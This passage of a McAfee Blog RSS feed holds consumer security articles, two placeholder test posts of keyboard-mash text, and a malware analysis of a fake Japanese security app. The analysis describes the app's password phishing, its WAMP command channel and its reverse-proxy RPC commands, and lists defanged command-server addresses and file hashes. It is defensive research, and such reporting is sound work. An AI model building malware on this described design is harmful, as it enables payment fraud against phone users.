McAfee Blog https://www.mcafee.com/blogs Internet Security News Mon, 05 Dec 2022 05:04:35 +0000 en-US hourly 1 https://wordpress.org/?v=5.9.1 https://www.mcafee.com/blogs/wp-content/uploads/2018/11/cropped-favicon-32x32.png McAfee Blog https://www.mcafee.com/blogs 32 32 Test Post 2 – 5 Dec Prod Release https://www.mcafee.com/blogs/internet-security/test-post-2-5-dec-prod-release/ Mon, 05 Dec 2022 05:04:35 +0000 https://www.mcafee.com/blogs/?p=162535

testasofasfaslfasdahsdiohasodihasodnaosdinaisdnasdnaobvscivbxcv !@#$%^&*()_+<>????~

The post Test Post 2 – 5 Dec Prod Release appeared first on McAfee Blog.

]]>

testasofasfaslfasdahsdiohasodihasodnaosdinaisdnasdnaobvscivbxcv

!@#$%^&*()_+<>????~

The post Test Post 2 – 5 Dec Prod Release appeared first on McAfee Blog.

]]>
Test Post – Prod Release 5 Dec https://www.mcafee.com/blogs/internet-security/test-post-prod-release-5-dec/ Mon, 05 Dec 2022 04:55:15 +0000 https://www.mcafee.com/blogs/?p=162531

test post test post test postiowfwfsdfffffffffffffffffffffffffffoiwheoir weroihorih dzfhsdfgusdkfsdkjfbasdlkfnsdlkfjsdjkf !@#$%^&*()_+<>?~

The post Test Post – Prod Release 5 Dec appeared first on McAfee Blog.

]]>

test post

test post

test postiowfwfsdfffffffffffffffffffffffffffoiwheoir weroihorih

dzfhsdfgusdkfsdkjfbasdlkfnsdlkfjsdjkf

!@#$%^&*()_+<>?~

The post Test Post – Prod Release 5 Dec appeared first on McAfee Blog.

]]>
‘Tis the Season for Holiday Scams https://www.mcafee.com/blogs/internet-security/tis-the-season-for-holiday-scams/ Sat, 03 Dec 2022 10:15:37 +0000 https://www.mcafee.com/blogs/?p=162439

This time of year, the air not only gets chillier but a bit cheerier for everyone … including online scammers....

The post ‘Tis the Season for Holiday Scams appeared first on McAfee Blog.

]]>

This time of year, the air not only gets chillier but a bit cheerier for everyone … including online scammers. Holiday scams are a quick way to make a buck, and cybercriminals employ several holiday-themed schemes to weasel money and personally identifiable information (PII) from gift givers. 

Here are three common holiday scams to watch out for this year, plus a few tips to help you stay safe online. 

1. Gift Card Cracking

Gift cards are a standby present for the people on your list who are difficult to buy for or for people you don’t know too well but want to get them a small something. Whether the gift card is worth $5 or $500, an online scammer can steal the entire value through two techniques: a brute force attack or phishing. Known as gift card cracking, cybercriminals can take wild guesses at gift card codes and cash in the value for themselves by methodically guessing strings of numbers and letters and crossing their fingers for a match. Cybercriminals will also employ phishing emails, texts or social media direct messages to trick people into divulging gift card information. 

To avoid gift card cracking, encourage gift receivers to redeem their gift card quickly to shorten the amount of time a scammer has to guess the code correctly. Or, you could opt for a paper gift certificate from a small business that doesn’t require online redeeming at all. To avoid gift card phishing scams, do not engage with any type of correspondence that claims they can double the value of your gift card or claims that there’s a problem with it. Be instantly on alert if anyone asks for the activation code. If the gift card-issuing business really needs to replace your purchase, they’ll issue you a new code. They’ll never ask for your existing one. 

2. Last-minute Shopping Scams

Are you a procrastinator? Watch out for last-minute shopping scams that are targeted at people who leave their gift buying until deep in December. As with anything else, if it’s too good to be true, it probably is. Shopping scams often take the form of phishing emails where criminals impersonate a well-known merchant or shipping company.  

While sales often have a quick timeline, don’t let that short timeline pressure you into making an impulsive decision. Phishers rely on people’s excitement or inattention to trick them into giving up their credit card or banking information. Phishing emails, when you take the time to inspect them, are usually easy to spot. The logos are often blurry, there are often typos and grammar mistakes, and the tone of the message will seem “off.” Either it will sound very formal and impersonalized or it will sound very informal and seem pushy. 

To protect your finances during the holiday season, consider putting a lock on your credit. This is easy to do with McAfee credit lock. You can still use your credit card and shop as you normally would. A credit lock is useful because, in case a criminal gets ahold of your PII, they won’t be able to open lines of credit in your name. This protects your credit score, which is essential to keep in good standing if you hope to buy a house or take out a loan anytime soon. 

3. Social Media Ads and Fake Shopping Sites

Just because a “company” has an ad on Facebook or Instagram doesn’t mean that it’s a legitimate establishment. Before buying from an online store you’ve never heard of, do some background research on it and read customer reviews to make sure that it’s real and will deliver you a quality product.  

Take note of the online store’s URL before entering it. (You can preview the link by hovering over it with your cursor.) If the URL is a string of letters and numbers, it could be a malware site in disguise. One way to alert you to suspicious sites is McAfee Web Protection. Web Protection color codes links to identify potential malware and phishing sites and alert you to steer clear. 

Shop Safely This Holiday Season 

Your mind is already drawn in a bunch of different directions this holiday season (cooking, traveling, shopping, wrapping, tidying) so give yourself a respite from worrying about the safety of your identity and finances. McAfee+ Ultimate includes a VPN, Web Protection, credit lock, antivirus and more to cover all your bases to keep your devices and your PII safe. 

The post ‘Tis the Season for Holiday Scams appeared first on McAfee Blog.

]]>
How To Help Your Family Protect Their Online Data https://www.mcafee.com/blogs/family-safety/how-to-help-your-family-protect-their-online-data/ Fri, 02 Dec 2022 10:37:57 +0000 https://www.mcafee.com/blogs/?p=162233

Whether you’re standing around the water cooler at work, waiting for your kids at the school gate or sitting around...

The post How To Help Your Family Protect Their Online Data appeared first on McAfee Blog.

]]>

Whether you’re standing around the water cooler at work, waiting for your kids at the school gate or sitting around the dinner table, data breaches are without doubt the hot topic of conversation. In late September, we were all shaken when news of the biggest Australian data breach to date broke – a record 10 million Optus customers had their details stolen. But unfortunately, the data breach stories have continued with Medibank, Energy Australia, and, most recently, Woolworths also reporting that private customer data had been stolen. 

Inevitably, many of us are feeling vulnerable worrying that our private identifying information (and our family’s) such as our Medicare and Drivers Licence details have potentially been stolen. We’ve all read the stories about victims of identity theft and are, rightly concerned, that it could happen to us. So, if you’re unsure as to what to do next – don’t worry – I’ve got you! In fact – I’m going to give you two action plans. The first is for those who have been personally affected by a data breach (or consider it highly likely they were affected) and the second, is a long-term plan to help you protect yourself and your family’s data online. 

What To Do If You’ve Been Affected By A Data Breach 

If you or a family member has been contacted by a company and informed that your private details have been compromised, then you need to caffeine up and bring your entire focus to this situation. And if you’re still awaiting the call but you’re thinking it’s likely you’re affected, then my advice is to assume you are. It never hurts to be too cautious when you’re dealing with a potential identity theft situation. So, here’s your plan: 

  1. If you think you’ve been affected, contact the company directly. Hopefully they can confirm whether you’re affected and identify what information was stolen eg drivers licence, birthdate, address, Medicare details. 
  2. If your drivers licence, passport or Medicare details have been stolen, then you are able to apply for new documents. You may need to apply for a Commonwealth Victim’s Certificate first. Do this as soon as possible. 
  3. Contact your bank and credit card providers and inform them that you have been the victim of a data breach and ask them to monitor accounts for suspicious activity. Also ask them to put additional verification methods in place, particularly for over the phone authentication. You may also want to do this for your superannuation accounts, MyGov and Centrelink accounts too. 
  4. Change your passwords for affected accounts immediately.  
  5. Do not click on links in text messages or emails claiming to be from the company that was affected by the data breach. If you are unsure, contact the company directly to verify the communication. 
  6. Monitor your bank accounts daily for suspicious or any unexpected activity. Also check your telephone and utilities accounts. Contact your bank or provider if you notice anything that looks a little suspect. 

What To Do To Ensure Your Online Data Is As Secure As Possible 

So, now it’s time to think long term. We all know prevention is key. So, what can we do to protect ourselves to minimise the risk of becoming a victim of identity theft (if and when) the next data breach occurs? Here’s your plan: 

1. Refine Your Password Strategy 

As we all know, it’s often the simplest things that can have the biggest impact. Ensuring you have a different but super complex password or passphrase for each of your online accounts is one of the best things you can do to protect yourself online. I appreciate that this may take a lot of work to implement but it’s so worth it. And here’s why – if you’re the victim of a data breach and your login details are stolen then you could be in a world of pain if you have just one password for all your accounts. Because within seconds of stealing your details, a hacker could potentially access your bank accounts, credit card accounts and online shopping sites where your credit card is saved – you get the picture! You see why it makes such sense! If it all feels a little overwhelming, why not use a password manager? Password managers can create and remember passwords that no human could even think of – genius! 

2. Use Multi-Factor Authentication When It’s Offered – Always! 

In summary, Multi-Factor Authentication (MFA) or 2 Factor Authentication (2FA) makes a hacker’s life a lot harder. In short, it requires the user to provide two or more verification factors to gain access to an account or app. This might be a text, email or even a code generated by an authentication app. So, even if a hacker has your password and username, if they can’t access the last piece of the puzzle, then you’re safe!!! 

3. Invest in A Top Tier Identity, Security and Protection Solution  

McAfee has just released a super-duper solution to help Aussies protect themselves online. McAfee+ is an all-in-one privacy, identity and device protection solution. Not only does it feature identity monitoring and a password manager but also an unlimited VPN, a file shredder, a protection score and parental controls. And the Rolls Royce version called McAfee+ Advanced, also offers subscribers additional identity protections including access to licensed restoration experts who can help you repair your identity and credit. It also gives subscribers access to lost wallet protection which help you cancel and replace your ID, credit cards if they are lost or stolen. 

4. Do A Little Cyber-Hygiene!  

Limiting your exposure online will also reduce the chance of being affected by a data breach. So, take some time to delete accounts you no longer use. Perhaps you had a side hustle on eBay a few years back but hadn’t bothered to close your accounts – well, now is the time. Close down those old eBay (and PayPal) accounts and any other accounts or subscriptions that you no longer use. 

And next time you purchase something from a new website, consider conducting your transaction as a guest only and not creating an account on their website. If there’s no benefit beyond saving a minute or two when you check out, why store your credit card number, address, and other identifying info on a website that may eventually be breached? 

If there is ever a time to take the management of your online data seriously, it’s now. Assuming that you won’t be a victim of a data breach and that ‘things like that don’t happen to you’ just doesn’t cut it. So, be proactive: sort out your passwords, turn on 2-factor authentication and practice some good quality cyber hygiene! And do yourself a favour and invest in some top-notch privacy and identity protection program like McAfee+ so you can continue living your best life online!  

The post How To Help Your Family Protect Their Online Data appeared first on McAfee Blog.

]]>
Let’s Make Security Easy https://www.mcafee.com/blogs/internet-security/lets-make-security-easy/ Fri, 02 Dec 2022 10:00:12 +0000 /blogs/?p=118825

You flick through some reels and an ad for “a more private phone” crops up. You scroll through your news...

The post Let’s Make Security Easy appeared first on McAfee Blog.

]]>

You flick through some reels and an ad for “a more private phone” crops up. You scroll through your news feed and catch wind of yet another data breach at a major retailer. You see a post from a friend who says their social media account was hacked. Maybe you don’t think about security every day, but when you do, it can feel … overwhelming. We’re here to solve that. We’re here to make security easy.  

As security providers, we have to offer protection against a wide variety of threats without adding more complexity to your already busy life. Managing your security should be easy, and even enjoyable. 

Enjoyable?  

Yes. We want you to have a sense of accomplishment, both knowledge and a feeling that you’re safer than you were before.  

With these things in mind, we set out to make your security software work better for you. We streamlined the experience to simplify what you see, while still offering robust protection. After all, true security is the security that you benefit from every day, and it’s up to us as providers to make it smooth and easy as possible. 

Smooth setup & a central hub 

Our new setup process now includes easier navigation, fewer screens, and clearer action items and alerts. It smoothly moves you through setting up protection across all the ways you interact online and your compatible devices. This way, you know that we’re helping to keep you safe whether you’re messaging, browsing, or shopping and banking online. 

Another area where we put a lot of focus is the new home screen. This is your home base, where we clearly show you what your current protection status is in the areas that matter the most to you. This includes making it easier to monitor your personal information and strengthen protections you already use, like passwords. 

Home Screen
Home Screen

 

The home screen is also where you come to perform essential tasks, such as running an antivirus scan. It guides you to take actions when needed, giving you proactive protection, and a clear view of your overall security in one convenient place. From here you can access details on the status of your PC, web, and identity protection.

 

PC Protection Category Page    
PC Protection Category Page  

 

      Caption: Web Protection Category Page
Web Protection Category Page

 

Identity Protection Category Page
Identity Protection Category Page

Effective Security, Made Easier

While we’re always focused on helping you feel confident and protected online, we realize that making our tools easy to use is just as important. The digital security landscape will continue to be a complicated one, with more than a million new and unique threats cropping up each day, but we can and are making security simpler, and therefore, more effective. 

With easier setup and protection that turns on automatically at the right moments, we want to make security easier for you so that you can feel safer online. We’ve heard your feedback about how we can improve, and we’ll bring all that goodness in a product that you can use every day. 

You’ll find this interface across our McAfee+ family of products, along with continual upgrades and improvements as we roll out more features that will keep you safer online.   

The post Let’s Make Security Easy appeared first on McAfee Blog.

]]>
Unwrapping Some of the Holiday Season’s Biggest Scams https://www.mcafee.com/blogs/privacy-identity-protection/unwrapping-some-of-the-holiday-seasons-biggest-scams/ Thu, 01 Dec 2022 12:54:33 +0000 https://www.mcafee.com/blogs/?p=162265

Even with the holidays in full swing, scammers won’t let up. In fact, it’s high time for some of their...

The post Unwrapping Some of the Holiday Season’s Biggest Scams appeared first on McAfee Blog.

]]>

Even with the holidays in full swing, scammers won’t let up. In fact, it’s high time for some of their nastiest cons as people travel, donate to charities, and simply try to enjoy their time with friends and family. 

Unfortunate as it is, scammers see this time of year as a tremendous opportunity to profit. While people focus giving to others, they focus on taking, propping up all manner of scams that use the holidays as a disguise. So as people move quickly about their day, perhaps with a touch of holiday stress in the mix, they hope to catch people off their guard with scams that wrap themselves in holiday trappings. 

Yet once you know what to look for, they’re relatively easy to spot. The same scams roll out every year, sometimes changing in appearance yet remaining the same in substance. With a sharp eye, you can steer clear of them. 

Watch out for these online scams this holiday season 

1. Shopping scams 

With Black Friday and Cyber Monday in the books, we can look forward to what’s next—a wave of post-holiday sales events that will likewise draw in millions of online shoppers. And just like those other big shopping days, bad actors will roll out a host of scams aimed at unsuspecting shoppers. Shopping scams take on several forms, which makes this a topic unto itself, one that we cover thoroughly in our Black Friday & Cyber Monday shopping scams blog. It’s worth a read if you haven’t done so already, as digs into the details of these scams and shows how you can avoid them.  

However, the high-level advice for avoiding shopping scams is this: keep your eyes open. Deals that look too good to be true likely are, and shopping with retailers you haven’t heard of before requires a little bit of research to determine if their track record is clean. In the U.S., you can turn to the Better Business Bureau (BBB) for help with a listing of retailers you can search simply by typing in their names. You can also use https://whois.domaintools.com to look up the web address of the shopping site you want to research. There you can see its history and see when it was registered. A site that was registered only recently may be far less reputable than one that’s been registered for some time. 

2. Tech support scams  

Plenty of new tech makes its way into our homes during the holiday season. And some of that tech can be a little challenging to set up. Be careful when you search for help online. Many scammers will establish phony tech support sites that aim to steal funds and credit card information. Go directly to the product manufacturer for help. Often, manufacturers will offer free support as part of the product warranty, so if you see a site advertising support for a fee, that could be a sign of a scam. 

Likewise, scammers will reach out to you themselves. Whether through links from unsolicited emails, pop-up ads from risky sites, or by spammy phone calls, these scammers will pose as tech support from reputable brands. From there, they’ll falsely inform you that there’s something urgently wrong with your device and that you need to get it fixed right now—for a fee. Ignore these messages and don’t click on any links or attachments. Again, if you have concerns about your device, contact the manufacturer directly. 

3. Travel scams 

With the holidays comes travel, along with all the online booking and ticketing involved. Scammers will do their part to cash in here as well. Travel scams may include bogus emails that pose as reputable travel sites telling you something’s wrong with your booking. Clicking a link takes you to a similarly bogus site that asks for your credit card information to update the booking—which then passes it along to the scammer so they can rack up charges in your name. Other travel scams involve ads for cut-rate lodging, tours, airfare, and the like, all of which are served up on a phony website that only exists to steal credit card numbers and other personal information. 

Some of these scams can look quite genuine, even though they’re not. They’ll use cleverly disguised web addresses that look legitimate, but aren’t, so don’t click any links. If you receive notice about an issue with your holiday travel, contact the company directly to follow up. Also, be wary of ads with unusually deep discounts or that promise availability in an otherwise busy season or time. These could be scams, so stick with reputable booking sites or with the websites maintained by hotels and travel providers themselves. 

4. Fake charity scams 

Donations to an organization or cause that’s close to someone’s heart make for a great holiday gift, just as they offer you a way to give back during the holiday season. And you guessed it, scammers will take advantage of this too. They’ll set up phony charities and apply tactics that pressure you into giving. As with so many scams out there, any time an email, text, direct message, or site urges you into immediate action—take pause. Research the charity. See how long they’ve been in operation, how they put their funds to work, and who truly benefits from them.  

Likewise, note that there some charities pass along more money to their beneficiaries than others. As a general rule of thumb, most reputable organizations only keep 25% or less of their funds for operations, while some less-than-reputable organizations keep up to 95% of funds, leaving only 5% for advancing the cause they advocate. In the U.S., the Federal Trade Commission (FTC) has a site full of resources so that you can make your donation truly count. Resources like Charity Watch and Charity Navigator, along with the BBB’s Wise Giving Alliance can also help you identify the best charities. 

5. Online betting scams 

The holidays also mean a flight of big-time sporting events, and with the advent of online betting in many regions scammers want to cash in. This scam works quite like shopping scams, where bad actors will set up online betting sites that look legitimate. They’ll take your bet, but if you win, they won’t pay out. Per the U.S. Better Business Bureau (BBB), the scam plays out like this: 

“You place a bet, and, at first, everything seems normal. But as soon as you try to cash out your winnings, you find you can’t withdraw a cent. Scammers will make up various excuses. For example, they may claim technical issues or insist on additional identity verification. In other cases, they may require you to deposit even more money before you can withdraw your winnings. Whatever you do, you’ll never be able to get your money off the site. And any personal information you shared is now in the hands of scam artists.” 

You can avoid these sites rather easily. Stick with the online betting sites that are approved by your regional gambling commission. Even so, be sure to read the fine print on any promo offers that these sites advertise because even legitimate betting sites can freeze accounts and the funds associated with them based on their terms and conditions. 

Further protection from scams 

A complete suite of online protection software, such as McAfee+ Ultimate can offer layers of extra security. In addition to more private and secure time online with a VPN, identity monitoring, and password management, it includes web browser protection that can block malicious and suspicious links that could lead you down the road to malware or a phishing scam—which antivirus protection can’t do alone. Additionally, we offer $1M identity theft coverage and support from a recovery pro, just in case. 

And because scammers use personal information such as email addresses and cell phone numbers to wage their attacks, other features like our  Personal Data Cleanup service can scan high-risk data broker sites for your personal information and then help you remove it, which can help reduce spam, phishing attacks, and deny bad actors the information they need to commit identity theft. 

Scammers love a good thing—and will twist it for their own benefit. 

That’s why they enjoy the holidays so much. With all our giving, travel, and charity in play, it’s prime time for their scams. Yet a little insight into their cons, along with some knowledge as to how they play out, you can avoid them.  

Remember that they’re playing into the hustle and bustle of the season and that they’re counting on you to lower your guard more than you might during other times of the year. Keep an eye open for the signs, do a little research when it’s called for, and stick with reputable stores, charities, and online services. With a thoughtful pause and a second look, you can spare yourself the grief of a scam and fully enjoy your holidays. 

The post Unwrapping Some of the Holiday Season’s Biggest Scams appeared first on McAfee Blog.

]]>
Fake Security App Found Abuses Japanese Payment System https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fake-security-app-found-abuses-japanese-payment-system/ Wed, 30 Nov 2022 18:41:29 +0000 https://www.mcafee.com/blogs/?p=162353

Authored by SangRyol Ryu and Yukihiro Okutomi  McAfee’s Mobile Research team recently analyzed new malware targeting mobile payment users in...

The post Fake Security App Found Abuses Japanese Payment System appeared first on McAfee Blog.

]]>

Authored by SangRyol Ryu and Yukihiro Okutomi 

McAfee’s Mobile Research team recently analyzed new malware targeting mobile payment users in Japan. The malware which was distributed on the Google Play store pretends to be a legitimate mobile security app, but it is in fact a payment fraud malware stealing passwords and abusing reverse proxy targeting the mobile payment services. McAfee researchers notified Google of the malicious apps, スマホ安心セキュリティ, or ‘Smartphone Anshin Security, package name com.z.cloud.px.app and com.z.px.appx. The applications are no longer available on Google Play. Google Play Protect has also taken steps to protect users by disabling the apps and providing a warning. McAfee Mobile Security products detect this threat as Android/ProxySpy.  

How do victims install this malware? 

The malware actor continues to publish malicious apps on the Google Play Store with various developer accounts. According to the information posted on Twitter by Yusuke Osumi, Security Researcher at Yahoo! Japan, the attacker sends SMS messages from overseas with a Google Play link to lure users to install the malware. To attract more users, the message entices users to update security software. 

A SMS message from France (from Twitter post by Yusuke)

A SMS message from France (from Twitter post by Yusuke)

malware on Google play

Malware on Google Play 

The Mobile Research team also found that the malware actor uses Google Drive to distribute the malware. In contrast to installing an application after downloading an APK file, Google Drive allows users to install APK files without leaving any footprint and makes the installation process simpler. Once the user clicks the link, there are only a few more touches required to run the application. Only three clicks are enough if users have previously allowed the installation of unknown apps on Google Drive. 

Following notification from McAfee researchers, Google has removed known Google Drive files associated with the malware hashes listed in this blog post. 

 

What does this malware look like?

When a user installs and launches this malware, it asks for the Service password. Cleverly, the malware shows incorrect password messages to collect the more precise passwords. Of course, it does not matter whether the password is correct or not. It is a way of getting the Service password. The Service password is used for the payment service which provides easy online payments. The user can start this payment service by setting a Service password. The charge will be paid along with the mobile phone bill. 

Interface comparison.
Interface comparison.

How does this malware work?

There is a native library named ‘libmyapp.so’ loaded during the app execution written in Golang. The library, when loaded, tries to connect to the C2 server using a Web Socket. Web Application Messaging Protocol (WAMP) is used to communicate and process Remote Procedure Calls (RPC). When the connection is made, the malware sends out network information along with the phone number. Then, it registers the client’s procedure commands described in the table below. The web socket connection is kept alive and takes the corresponding action when the command is received from the server like an Agent. And the socket is used to send the Service password out to the attacker when the user enters the Service password on the activity. 

RPC Function name  Description 
connect_to  Create reverse proxy and connect to remote server 
disconnect  Disconnect the reverse proxy 
get_status  Send the reverse proxy status 
get_info  Send line number, connection type, operator, and so on 
toggle_wifi  Set the Wi-Fi ON/OFF 
show_battery_opt  Show dialog to exclude battery optimization for background work 

Registered RPC functions description 

Initial Hello packet contains personal information
Initial Hello packet contains personal information
Sending out The Service password
Sending out The Service password

To make a fraudulent purchase by using leaked information, the attacker needs to use the user’s network. The RPC command ‘toggle_wifi’ can switch the connection state to Wi-Fi or cellular network, and ‘connect_to’ will provide a reverse proxy to the attacker. A reverse proxy can allow connecting the host behind a NAT (Network Address Translation) or a firewall. Via the proxy, the attacker can send purchase requests via the user’s network. 

Network and command flow diagram
Network and command flow diagram

Conclusion

It is an interesting point that the malware uses a reverse proxy to steal the user’s network and implement an Agent service with WAMP. McAfee Mobile Research Team will continue to find this kind of threat and protect our customers from mobile threats. It is recommended to be more careful when entering a password or confidential information into untrusted applications. 

IoCs (Indicators of Compromise) 

193[.]239[.]154[.]23
91[.]204[.]227[.]132
ruboq[.]com 

SHA256  Package Name  Distribution  
5d29dd12faaafd40300752c584ee3c072d6fc9a7a98a357a145701aaa85950dd  com.z.cloud.px.app  Google Play 
e133be729128ed6764471ee7d7c36f2ccb70edf789286cc3a834e689432fc9b0  com.z.cloud.px.app  Other 
e7948392903e4c8762771f12e2d6693bf3e2e091a0fc88e91b177a58614fef02  com.z.px.appx  Google Play 
3971309ce4a3cfb3cdbf8abde19d46586f6e4d5fc9f54c562428b0e0428325ad  com.z.cloud.px.app2  Other 
2ec2fb9e20b99f60a30aaa630b393d8277949c34043ebe994dd0ffc7176904a4  com.jg.rc.papp  Google Drive 
af0d2e5e2994a3edd87f6d0b9b9a85fb1c41d33edfd552fcc64b43c713cdd956  com.de.rc.seee  Google Drive 

 

The post Fake Security App Found Abuses Japanese Payment System appeared first on McAfee Blog.

]]>
What Are Tailgating Attacks and How to Protect Yourself From Them https://www.mcafee.com/blogs/tips-tricks/what-are-tailgating-attacks-and-how-to-protect-yourself-from-them/ Tue, 29 Nov 2022 13:46:33 +0000 https://www.mcafee.com/blogs/?p=162263 Whether you’re spending time on the web or working in the office, you want peace of mind knowing that you...

The post What Are Tailgating Attacks and How to Protect Yourself From Them appeared first on McAfee Blog.

]]>
Whether you’re spending time on the web or working in the office, you want peace of mind knowing that you are in a safe environment. While most of us know to take precautions when online — protecting ourselves from things like phishing attacks and other cyber threats — we should also attend to our physical security. 

One concern is tailgating — a social engineering attack where someone gets physical access to a business to take confidential information or do other harm. 

Here are some ways to protect yourself from tailgating attacks, such as an unauthorized person following you into a restricted area while on the job. 

What is a tailgating attack?

Tailgating is a type of social engineering attack where an unauthorized person gains physical access to an off-limits location — perhaps a password-protected area — where they might steal sensitive information, damage property, compromise user credentials or even install malware on computers. 

Piggybacking” is closely related to tailgating, but it involves consent from the duped employee. So, while a worker might be unaware that someone has tailgated them into a restricted area with piggybacking, the hacker might convince a worker to provide access because they are posing as, say, a delivery driver. 

Who’s at risk of tailgating attacks?

Companies, particularly at risk of being targeted by tailgating scams, include those: 

  • With many employees, often moving inside and out of the premises 
  • With multiple entrance points into a building 
  • That receive deliveries of food, packages, documents, and other things regularly 
  • That have many subcontractors working for them 
  • Where employees aren’t thoroughly trained in physical and cybersecurity protocols 

Generally speaking, companies with robust security systems in place — including using biometrics, badges, or other identity and information security measures — are better protected from tailgating and piggybacking attacks.  

But that’s not to say that some smooth-talking fraudster can’t talk someone into letting them in or finding some way around those protections. 

What are common tailgating methods?

Common types of tailgating attacks that you should be aware of on the job include:  

  • Someone walking behind you into a secure area, depending on your common courtesy to keep the door open for them 
  • A courier or delivery driver who aren’t what they seem 
  • Someone with their hands full of items to trick you into opening the door for them 
  • A person who claims they’ve lost their work ID or forgotten it at home, so that you grant them admittance 

How to protect yourself from tailgating attacks 

Protecting yourself from tailgating attacks is partly a matter of learning about the issue, raising your level of awareness on the job, and depending on your employer, putting in place more effective security systems.  

Some solutions include: 

Increased security training

Many companies know how to train employees to recognize, avoid, and cope with online security issues but may forget to provide the same diligence to physical security. How to spot and deal with threats should be part of this training, plus cultivating an awareness of surroundings and people who might be out of place.   

Management should offer a clearly stated security policy taught to everyone, which might insist that no one be allowed into a secure area without the proper pass or identification. As the security policy is updated, all employees should be aware of changes and additions. 

These security measures should be part of an overall protection program, like McAfee+, which includes antivirus software, a firewall, identity monitoring, password management, web protection, and more. 

Smart badges and cards

If you have a large business spread over several floors, it can be hard for employees to know who works there and who doesn’t, leaving them susceptible to tailgating and piggybacking attacks. Requiring smart badges and cards to access restricted areas can help cut back on unauthorized intrusions and provide better access control. 

Building fully staffed reception areas with dedicated security personnel could also be part of a larger security system. 

Biometric scanners

Biometric scanners are an even more advanced way to provide proper authentication for a worker’s identity. They scan a unique physical or audible feature of a person and compare it to a database for approved personnel.  

Examples of biometric security include: 

  • Voice recognition 
  • Iris recognition 
  • Fingerprint scans 
  • Facial recognition 
  • Heart-rate sensors 

Understanding social engineering

One reason people are vulnerable to physical and cyberattacks is that they lack education on social engineering and the kinds of threats it poses.  

Workers need to understand the full range of social engineering techniques and know-how to protect themselves, whether in their social media accounts or physical work environment.  

For their part, companies can use simulated phishing emails and tailgating attacks to raise awareness and underline how to follow protocols in dealing with them. 

Video surveillance

If there are many ways to enter a business, it may make sense to put video surveillance on all entrances. Advanced video surveillance systems can use artificial intelligence (AI) and video analytics to scan the faces of people entering and compare them to a database of employee features. 

Discover how McAfee can help keep devices secure from hacking

Whether at work or at home, people want to be secure from attacks by cybercriminals who seek to take personal information. 

To add a layer of security to all their connected devices — including computers, smartphones, and tablets — an increasing number of people are turning to the comprehensive coverage of McAfee+ 

Features range from advanced monitoring of possible threats to your identity, automatic implementation of virtual private networks (VPNs) to deal with unsafe networks, and personal data clean-up, removing your information from high-risk data broker sites. 

McAfee protection allows you to work and play online with greater peace of mind. 

The post What Are Tailgating Attacks and How to Protect Yourself From Them appeared first on McAfee Blog.

]]>
McAfee Personal Data Cleanup: Your Partner in Living a More Private Online Life https://www.mcafee.com/blogs/privacy-identity-protection/mcafee-personal-data-cleanup-your-partner-in-living-a-more-private-online-life/ Mon, 28 Nov 2022 10:23:14 +0000 https://www.mcafee.com/blogs/?p=162203

Do yourself a favor: Open a new browser tab and head to your search engine of choice. Type in your...

The post McAfee Personal Data Cleanup: Your Partner in Living a More Private Online Life appeared first on McAfee Blog.

]]>

Do yourself a favor: Open a new browser tab and head to your search engine of choice. Type in your full name and home address. Then, see what pops up. 

Are the results sparking an ember of unease in the back of your brain? Whether you’re a private person online or you’re comfortable sharing your daily life updates on social media, there are likely to be several personal details about you on sites that shouldn’t have that information. Some of these sites may be data brokerage websites.  

Data brokerage sites are legal and are mostly used by annoying advertisers, though cybercriminals may also use them maliciously. The average person has their information for sale on 31 data brokerage sites, and 95% of people have their personal information on sale without their permission. 

So how do you scrub the internet of your personal details to keep your identity secure? McAfee Personal Data Cleanup is a service that prevents your personal information from being collected and sold online. Here’s why you should consider taking a few easy steps now to give you peace of mind about the security of your personally identifiable information (PII). 

Make Your Attack Surface as Small as Possible 

Attack surface is a term usually applied to corporate security, but it’s a great visualization for everyday people going about their personal online errands and entertainment. An attack surface is the number of possible entry points a cybercriminal could weasel their way through to get at your valuable and private information. Entry points include your social media profiles, your online shopping accounts, and data brokerage sites. The fewer entry points you have, the harder it is for cybercriminals to find and exploit them. 

While Social Security Numbers (SSNs) are generally revered as the piece of PII to guard most closely, a cybercriminal can still damage your identity with just your name and an address, email address, or phone number. For example, they can request new passwords or multifactor authentication one-time passcodes to break their way into online banking or shopping accounts. Security breaches are happening to huge companies all over the world. All it takes is for your SSN to be leaked in one of them, for a cybercriminal to piece together your digital clone and use it to harm your identity or credit. 

Personal Data Cleanup minimizes your attack surface by removing as much PII as possible that’s floating around the internet, just waiting for someone to buy it.  

Give Yourself a Blank Online Slate 

When you’re aware of how many unauthorized vendors are selling your PII, it could be the wakeup call you need start adopting more cautious online habits. For instance, oversharing on social media leaks a lot of valuable details that a savvy criminal can then use to take educated guesses at your passwords or craft a social engineering plot catered just to you. 

The present is as good a time as any to start protecting your identity for the future; however, getting started is often the most difficult step. It can seem overwhelming to reach out to every data brokerage site individually and request they remove your info. Personal Data Cleanup can be your partner not only in beginning the cleanup process but in monitoring your data security to keep your online presence as minimal as possible. The service scans the internet’s riskiest sites and then, before deleting your information from these sites, runs it by you to confirm. Then, it will continually monitor those same sites, as your information will likely reappear every two to four months. 

Cleaning Up Your Data Is So Easy, There’s No Reason Not To 

Do not underestimate the tenacity of a cybercriminal. Even for people who have the attitude that their PII is bound to be somewhere online and that it’s no big deal, McAfee Personal Data Cleanup manages three key steps in the data removal process: scanning, removing, and monitoring. So, even if you’re not convinced that data brokerage sites are a threat, the process is too easy to put off any longer! 

For those who are concerned about their online privacy, full-service Personal Data Cleanup is included in McAfee+ Ultimate, which is the complete package to let you live your online life in private. McAfee+ Ultimate also includes identity monitoring and identity theft resolution services, unlimited VPN, credit lock, and much more.  

In 2021, more than 1.4 million identity theft complaints were filed to the Federal Trade Commission.1 Identity theft can occur to anyone, so take steps today, starting with data brokerage sites, to live a more secure and more private digital life. 

1Federal Trade Commission, “New Data Shows FTC Received 2.8 Million Fraud Reports from Consumers in 2021 

The post McAfee Personal Data Cleanup: Your Partner in Living a More Private Online Life appeared first on McAfee Blog.

]]>
What is Antivirus and What Does It Really Protect? https://www.mcafee.com/blogs/internet-security/what-is-antivirus-and-what-does-it-really-protect/ Fri, 25 Nov 2022 14:12:00 +0000 https://www.mcafee.com/blogs/?p=162159

Authored by Dennis Pang What is antivirus? That’s a good question. What does it really protect? That’s an even better...

The post What is Antivirus and What Does It Really Protect? appeared first on McAfee Blog.

]]>

Authored by Dennis Pang

What is antivirus? That’s a good question. What does it really protect? That’s an even better question. 

Over the years, I’ve come to recognize that different people define antivirus differently. Some see it as way to keep hackers from crashing their computers. Others see it as a comprehensive set of protections. Neither definition is entirely on the money. 

